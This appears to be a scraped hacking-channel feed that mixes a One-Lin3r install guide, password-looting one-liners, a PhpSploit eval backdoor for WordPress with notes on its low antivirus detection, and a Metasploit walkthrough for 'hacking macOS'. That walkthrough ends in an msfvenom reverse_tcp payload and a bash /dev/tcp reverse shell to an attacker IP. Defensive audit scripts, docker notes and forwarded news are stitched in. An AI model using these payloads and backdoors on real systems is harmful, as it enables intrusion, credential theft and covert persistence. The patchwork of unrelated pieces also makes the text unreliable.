▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
🦑Updated windows hacking
One-Lin3r is a simple, modular and lightweight framework that gives you all the one-liners you will need while penetration testing (Windows, Linux, macOS or even BSD systems) or hacking generally, with a lot of new features to make all of this fully automated (e.g. you won't even need to copy the one-liners).
INSTALLATION & RUN:
A) For Debian-based Linux distros (e.g. Kali, Ubuntu):
1) git clone https://github.com/D4Vinci/One-Lin3r.git
2) sudo apt install libncurses5-dev
3) sudo pip3 install ./One-Lin3r --user
one-lin3r -h
B) For other Linux distros:
1) git clone https://github.com/D4Vinci/One-Lin3r.git
2) sudo pip3 install ./One-Lin3r --user
one-lin3r -h
FEATURES:
It's designed to fix typos in typed commands, replacing them with the most similar command in just one tab click, so seach becomes search and so on, even if you typed a random word similar to a command in this framework.
For you lazy ones out there like me, it can predict which liner you are trying to use when you type any part of it. For example, if you typed use capabilities and pressed tab, it would be replaced with use linux/bash/list_all_capabilities and so on. I can see your smile. You are welcome!
If you typed a wrong command and then pressed enter, the framework will tell you the nearest command to what you typed, which could be the one you really wanted.
Some less impressive things, like auto-complete for variables after the set command, auto-complete for liners after the use and info commands, and finally it converts all uppercase to lowercase automatically, just in case you switched cases by mistake while typing.
Finally, you'll find the normal auto-completion features you were using before, like command auto-completion and persistent history, etc.
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
🦑SOME LINUX TIPS:
A) Looting for passwords
Files containing passwords
grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
Old passwords in /etc/security/opasswd
The /etc/security/opasswd file is also used by pam_cracklib to keep the history of old passwords so that the user will not reuse them.
B) ⚠️ Treat your opasswd file like your /etc/shadow file, because it will end up containing user password hashes.
Last edited files
Files that were edited in the last 10 minutes
find / -mmin -10 2>/dev/null | grep -Ev "^/proc"
In memory passwords
strings /dev/mem -n10 | grep -i PASS
Find sensitive files
$ locate password | more
/boot/grub/i386-pc/password.mod
/etc/pam.d/common-password
/etc/pam.d/gdm-password
/etc/pam.d/gdm-password.original
/lib/live/config/0031-root-password
(from git)
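A defender-side check for the opasswd warning above, as an added example that is not part of the original post: it verifies that a file holding password hashes has the expected owner and grants neither group-write nor any world access. The function name `audit_secret_file` is hypothetical, and a `stat` that supports `-c` (GNU or BusyBox) is assumed.

```shell
#!/bin/sh
# Added example: flag password-history/shadow files that are more exposed
# than they should be. Assumes GNU or BusyBox stat (-c FORMAT).

# audit_secret_file PATH [EXPECTED_UID]
# Prints one line per finding; returns 0 if clean or absent, 1 otherwise.
audit_secret_file() {
    path=$1 want_uid=${2:-0} rc=0
    if [ ! -e "$path" ]; then
        echo "SKIP $path: not present"
        return 0
    fi
    mode=$(stat -c '%a' "$path")   # octal permission bits, e.g. 600
    uid=$(stat -c '%u' "$path")    # numeric owner
    if [ "$uid" != "$want_uid" ]; then
        echo "FAIL $path: owned by uid $uid, expected $want_uid"
        rc=1
    fi
    # 007 = any access for "other", 020 = group write. Either one lets an
    # account other than the owner read or replace the stored hashes.
    if [ $(( 0$mode & 027 )) -ne 0 ]; then
        echo "FAIL $path: mode $mode grants group-write or world access"
        rc=1
    fi
    [ "$rc" -eq 0 ] && echo "OK   $path: uid $uid, mode $mode"
    return "$rc"
}

# The two files the post says to protect alike.
for f in /etc/shadow /etc/security/opasswd; do
    audit_secret_file "$f" || true
done
```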
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
Forwarded from UNDERCODE NEWS
Entos Information & Communication launches electronic access list + face recognition heat detection solution 'NARMS'
#international #Technologies
Forwarded from UNDERCODE NEWS
KT Holds "Communication Big Data Platform Road Show", which gathered in one place for communication big data
#international
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
🦑Backdooring WordPress with Phpsploit:
PhpSploit is a remote control framework that aims to provide a stealthy, interactive, shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable of maintaining access to a compromised web server for privilege escalation purposes.
INSTALLATION & RUN:
download https://github.com/nil0x42/phpsploit
When running Phpsploit and generating a standard backdoor to place in WordPress or PHP-code it looks like this:
<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>
The above code can be generated by running the following command:
./phpsploit --interactive --eval "backdoor"
And if we insert this little eval code snippet into a WordPress PHP file and then upload the file to VirusTotal, the detection rate looks like this for the 58 different antivirus scanners currently online on VirusTotal:
Just one hit, and it is ClamAV detecting the backdoor as Php.Trojan.PhpSploit-7157376-0.
If we then run phpsploit again and set another PASSKEY as example
And it should be quite easy to trigger IDS alerts at the network level, since PHP code like eval and base64_decode should not be part of an HTTP header. This can of course also be changed in Phpsploit by using the command set REQ_HEADER_PAYLOAD.
from wpsec
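Both detection points from the post, as an added example (not code from wpsec or the phpsploit project): a file check that keys on eval() of any `$_SERVER['HTTP_*']` value rather than on the default PHPSPL01T name, and a header check for eval/base64_decode call syntax. The header name `X_DEMO_KEY`, the request lines and the function names are constructed for illustration; real traffic may look different.

```shell
#!/bin/sh
# Added example, not phpsploit or wpsec code. Sample data is constructed.

# eval() fed directly from a request header, whatever the header is named,
# so a changed PASSKEY does not escape the check. '\'' embeds a single quote.
EVAL_HDR_RE='eval[[:space:]]*\([[:space:]]*\$_SERVER[[:space:]]*\[[[:space:]]*["'\'']HTTP_[A-Za-z0-9_]+'
# PHP call syntax (the two functions the post names) inside a header line.
PHP_IN_HDR_RE='^[A-Za-z0-9-]+:.*(eval|base64_decode)[[:space:]]*\('

# scan_webroot DIR: print file:line:text per hit; status 0 only if something hit.
scan_webroot() {
    hits=$(find "$1" -type f -name '*.php' \
        -exec grep -EinH -- "$EVAL_HDR_RE" {} + 2>/dev/null || true)
    [ -n "$hits" ] && printf '%s\n' "$hits"
}

# scan_headers: read raw request header lines on stdin, print suspicious ones.
scan_headers() {
    grep -Ei -- "$PHP_IN_HDR_RE"
}

# make_samples DIR: write the constructed test corpus.
make_samples() {
    mkdir -p "$1/www"
    cat > "$1/www/default.php" <<'EOF'
<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>
EOF
    cat > "$1/www/renamed.php" <<'EOF'
<?php @eval( $_SERVER["HTTP_X_DEMO_KEY"] ); ?>
EOF
    cat > "$1/www/clean.php" <<'EOF'
<?php echo htmlspecialchars($_SERVER['HTTP_HOST']); ?>
EOF
    cat > "$1/request.txt" <<'EOF'
Host: blog.example
Referer: https://blog.example/retrieval?q=1
Phpspl01t: eval(base64_decode('CONSTRUCTED'))
EOF
}

demo_dir=$(mktemp -d)
make_samples "$demo_dir"
scan_webroot "$demo_dir/www" || true
scan_headers < "$demo_dir/request.txt" || true
rm -rf "$demo_dir"
```

The Referer line contains "eval" inside "retrieval" and is not reported, because the header pattern requires the opening parenthesis of a call.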
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
🦑Download & run nginx
1) [root@localhost my.Shells]# docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
docker.io/redis latest 1e70071f4af4 6 weeks ago 106.7 MB
2) [root@localhost my.Shells]# docker pull nginx   # download nginx
Using default tag: latest
Trying to pull repository docker.io/library/nginx ...
latest: Pulling from docker.io/library/nginx
e7bb522d92ff: Pull complete
6edc05228666: Pull complete
cd866a17e81f: Pull complete
Digest: sha256:285b49d42c703fdf257d1e2422765c4ba9d3e37768d6ea83d7fe2043dad6e63d
3) [root@localhost my.Shells]# docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
docker.io/nginx latest 3f8a4339aadd 3 weeks ago 108.5 MB
docker.io/redis latest 1e70071f4af4 6 weeks ago 106.7 MB
4) Run nginx
[root@localhost my.Shells]# docker run -p 8080:80 -d docker.io/nginx
c0462d5e18783e20f9515108fa62ab0f2ac808ea85370a7c82aee9407abf4672
[root@localhost my.Shells]# netstat -anp | grep 8080
tcp6 0 0 :::8080 :::* LISTEN 2529/docker-proxy-c
5) [root@localhost my.Shells]# docker ps   # nginx is already running
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
c0462d5e1878 docker.io/nginx "nginx -g 'daemon off" 4 minutes ago Up 4 minute
6) Run results
[root@localhost my.Shells]# ./openFirewallPort.sh
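---openFirewallPort.sh-------
#!/bin/bash
echo "enter the port: "
read -r port
# accept digits only, so the input cannot smuggle extra firewall-cmd arguments
case "$port" in ''|*[!0-9]*) echo "invalid port" >&2; exit 1 ;; esac
firewall-cmd --add-port="$port/tcp"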
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
Forwarded from UNDERCODE NEWS
The US Spy Agency warns of attacks by Chinese hackers on the army, security and industry.
#CyberAttacks
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
🦑HACK MACOS WITH PAYLOAD-Metasploit:
1) Turn on your Kali and open a terminal.
2) Type in msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.26.130 LPORT=4444 > pyterpreter.py
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.26.130 LPORT=4444 > pyterpreter.py
Now the pyterpreter.py should appear in your Home folder
3) Open a new terminal and launch Metasploit by typing in msfconsole and press Enter. We need to set up a listener so when the script is running on the Mac computer it will instantly connect back to our attack machine.
msfconsole
4) In the new terminal, type in use multi/handler and press Enter
5) Now we need to set the PAYLOAD, the LHOST which is the attacker IP address and the LPORT which is the port we want to listen on. You can do that by executing the following commands consecutively.
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 192.168.26.130
set LPORT 4444
6) To start up the handler, enter this command exploit -j -z
exploit
7) Now send the pyterpreter.py file to the Mac machine and execute it.
Enter the command session -i 1 and press Enter. You should now be able to interact with the Mac machine.
bash -i >& /dev/tcp/192.168.26.130/4444 0>&1 2>&1
This command simply means "send an interactive bash session to IP address 192.168.26.130 on TCP port 4444."